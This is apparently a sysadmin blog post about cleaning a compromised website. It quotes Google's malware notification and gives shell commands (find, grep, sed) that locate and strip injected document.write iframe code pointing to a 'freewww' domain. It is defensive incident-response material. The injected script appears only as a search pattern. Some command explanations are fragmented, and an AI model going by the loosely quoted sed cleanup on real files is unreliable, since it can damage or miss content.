A customer just called for emergency when they got a mail from Google saying their websites are infected by malware. It took half an hour to analyse and resolve the situation. We show how to get rid of malware using UNIX command line tools.
Datum: 15.12.2012 07:04
Betreff: Malware notification regarding example.de
An: firstname.lastname@example.org, email@example.com, firstname.lastname@example.org, email@example.com, firstname.lastname@example.org, email@example.com, firstname.lastname@example.org, email@example.com
Dear site owner or webmaster of example.de, We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.
Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):
Here is a link to a sample warning page:
We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:
1) the site was compromised
2) the site doesn’t monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious advertiser
If your site was compromised, it’s important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites:
Once you’ve secured your site, you can request that the warning be removed by visiting
and requesting a review. If your site is no longer harmful to users, we will remove the warning.
Google Search Quality Team
Note: if you have an account in Google’s Webmaster Tools, you can verify the authenticity of this message by logging into https://www.google.com/webmasters/tools/siteoverview and going to the Message Center, where a warning will appear shortly.
.js files by ourselves we saw that
document.write() function to add text to a HTML document.
To find all infected files I used a
find combined with
$ find . -type f -print0 | xargs -0 grep -l iframe | grep document.write
-type fFind all
files, not e.g. directories
-print0Every found filename is terminated by
xargsProcess each input item
-0Read lines terminated by
grep -lLook for content in file and list filename only
iframeContent to look for
grep document.writeFilter for string
The filename provided by
find is automatically added as an argument to
xargs is a program to execute a command for every
thing got e.g. via
stdin, as is with the pipe and
Result is a list with all infected files.
In this case the referenced sites were
freewww.biz|info|..., so find all
*freewww* and remove the code using
for f in $(find . -type f -print0 | xargs -0 grep -l freewww) do sed -i '' -e 's/;document.write(.<iframe .* src=.*freewww.*><\/iframe>.);//' $f done
find . -type f -print0 | xargs -0 grep -l freewwwFind all files containing the string
for f in $(...)Process all found files referencing them by
sedto search and replace
s/oldvalue/newvalue/optionsthe malicious instruction
;document.write( <iframe src=freewww><\/iframe>.);with “nothing”. Use wildcards to ignore other noise in
What was this all about? I’m pretty sure it was the last change the customer had requested a few days ago:
Please allow automatic updates of my Whatever PHP-based application, so allow write access for the webserver.
Why am I sure?
I usually do not allow write access for the webserver (except e.g. for file uploads, temporary files for sessions) and I can’t remember the last time I had such a situation :-D